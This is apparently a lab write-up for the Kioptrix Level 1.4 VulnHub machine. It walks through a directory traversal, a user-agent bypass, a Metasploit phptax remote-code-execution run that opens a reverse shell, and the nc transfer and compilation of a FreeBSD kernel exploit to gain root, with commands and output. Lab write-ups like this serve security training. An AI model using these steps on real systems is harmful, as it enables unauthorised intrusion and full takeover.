VulnHub Writeup : Kioptrix Levle 1.4 (#5)
Box Stats :
|Box Name||Kioptrix Level 1.4|
|Release Date||6 Apr 2014|
The IP of target vm is
192.168.1.159, Perform nmap scan on targat
$ nmap -sV --top-ports 1000 192.168.1.159 -oN nmap.txt Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-26 16:38 EDT Nmap scan report for 192.168.1.159 Host is up (0.00050s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) 8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 30.54 seconds
As we can see port 80 and 8080 are open. Checking port 80 web server, it only had
It works! message, but in page source there is commented part which points to pchart link
http://192.168.1.159/pchart2.1.3/index.php there is an pchart application hosted on port 80
Now google search shows that pChart 2.1.3 has XSS and Directory traversal vulnerability, where directory traversal vulnerability can be exploited by accessing below link
at this point can not do much with this vulnerability, now lets check port 8080.
It says access forbidden. But we can access the apache server httpd.conf file because of directory traversal vulnerability. And we also know that the os is FreeBsd then the location of
httpd.conf file would be
/usr/local/etc/apache2x/httpd.conf, now lets try to access it.
The above picture shows the last lines of
httpd.conf file which indicates that the browser user agent has been checked by the web server and if user agent is
Mozilla/4.0 then only it can access the application running on port 8080.
So we have to change the browser user agent to mozilla/4.0, and for that we are going to install User agent switcher plugin into firefox browser and then try to access the service running on port 8080
Mozilla/4.0 (compatible; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8) to Kioptrix5
Now enable the custom user agent then access
the phptax app is hosted on
http://192.168.1.159:8080/phptax/, a google search on phptax has Remote code execution vulnerability, and there also a metasploit module available to for phptax rce vulnerability, so we are going to use metasploit.
msf6 > use exploit/multi/http/phptax_exec msf6 exploit(multi/http/phptax_exec) > set RHOSTS 192.168.1.159 RHOSTS => 192.168.1.159 msf6 exploit(multi/http/phptax_exec) > set RPORT 8080 RPORT => 8080 msf6 exploit(multi/http/phptax_exec) > set payload cmd/unix/reverse payload => cmd/unix/reverse msf6 exploit(multi/http/phptax_exec) > set lhost 192.168.1.6 lhost => 192.168.1.6 msf6 exploit(multi/http/phptax_exec) > exploit [*] Started reverse TCP double handler on 192.168.1.6:4444 [*] 192.168.1.1598080 - Sending request... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo y6th2VULrYqot44x; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Command: echo jVPGdJKnv4d3Y4jP; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "Connected: not found\r\nEscape: not found\r\njVPGdJKnv4d3Y4jP\r\n" [*] Reading from socket B [*] B: "y6th2VULrYqot44x\r\n" [*] Matching... [*] A is input... [*] Matching... [*] B is input... [*] Command shell session 1 opened (192.168.1.6:4444 -> 192.168.1.159:25038) at 2021-10-27 16:06:00 -0400 [*] Command shell session 2 opened (192.168.1.6:4444 -> 192.168.1.159:35833) at 2021-10-27 16:06:00 -0400 whoami www id uid=80(www) gid=80(www) groups=80(www) uname -a FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 firstname.lastname@example.org:/usr/obj/usr/src/sys/GENERIC amd64
Now for privilege escalation, there is a kernel exploit available for FreeBSD 9.0 at exploitdb. Now first download the exploit into attacker machine, then we have to upload/send the exploit code into target machine and compile it and run it on target.
We are going to use nc to send the exploit into target machine
wget https://www.exploit-db.com/download/26368 -O exploit.c nc -lvvp 8888 < exploit.c
the nc listener is listening on port 8888. To download it into target machine, just connect to the attacker machine by
nc 192.168.1.6 8888 > exploit.c
It may takes few seconds to download, then compile and run the exploit
gcc exploit.c -o exploit exploit.c:89:2: warning: no newline at end of file ./exploit id uid=0(root) gid=0(wheel) egid=80(www) groups=80(www) whoami root
And as we can see we have root access to the machine..